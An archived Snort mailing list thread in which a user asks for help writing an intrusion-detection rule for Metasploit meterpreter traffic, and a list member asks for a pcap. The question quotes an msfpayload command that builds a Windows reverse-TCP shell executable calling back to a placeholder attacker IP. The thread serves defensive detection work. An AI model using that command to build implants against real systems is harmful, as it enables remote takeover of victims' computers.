Snort mailing list archives
Re: how to write rule for msfpayload in linux
From: DFIRob via Snort-users <snort-users () lists snort org>
Date: Mon, 20 Nov 2017 21:31:35 +0100
Your link has been blocked by Google Drive. In the future, please share a zip file with the password 'virus' or 'infected' to prevent automated removal. Also, since msf is open source, I encourage you to dig into how they implement network traffic between the implant and the C2 server.

--rob

On Sun, Nov 19, 2017 at 2:31 AM, nguyen cao <nguyenblack1995 () gmail com> wrote:

> On the attacker I use:
>
> msfpayload windows/meterpreter/reverse_tcp LHOST=(IP_attacker) LPORT=4444 X > /root/Desktop/payload.exe
>
> msfpayload2 <https://drive.google.com/file/d/10MzIeyeThWHMfuhNyDJTuG3Y4QJ_qjcA/view?usp=drive_web>
>
> (in order to create the file payload.exe). When I run the file payload.exe on the victim PC, I will take control of the victim's system. I run Wireshark and match packets, but I do not know where to start in order to write a rule for this type of attack.
>
> 2017-11-19 2:16 GMT+07:00 DFIRob <rd.seclists () gmail com>:
>
>> Hi, do you have a pcap that you want to alert on?
>>
>> On Sat, Nov 18, 2017 at 3:22 PM, nguyen cao via Snort-users <snort-users () lists snort org> wrote:
>>
>>> Who can help me write a rule for msfpayload in Linux? Create the payload with msfpayload: msfpayload windows/meterpreter/reverse_tcp LHOST=/ / LPORT=/ /....
>>>
>>> _______________________________________________
>>> Snort-users mailing list
>>> Snort-users () lists snort org
>>> Go to this URL to change user options or unsubscribe: https://lists.snort.org/mailman/listinfo/snort-users
>>> Please visit http://blog.snort.org to stay current on all the latest Snort news!
>>> Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette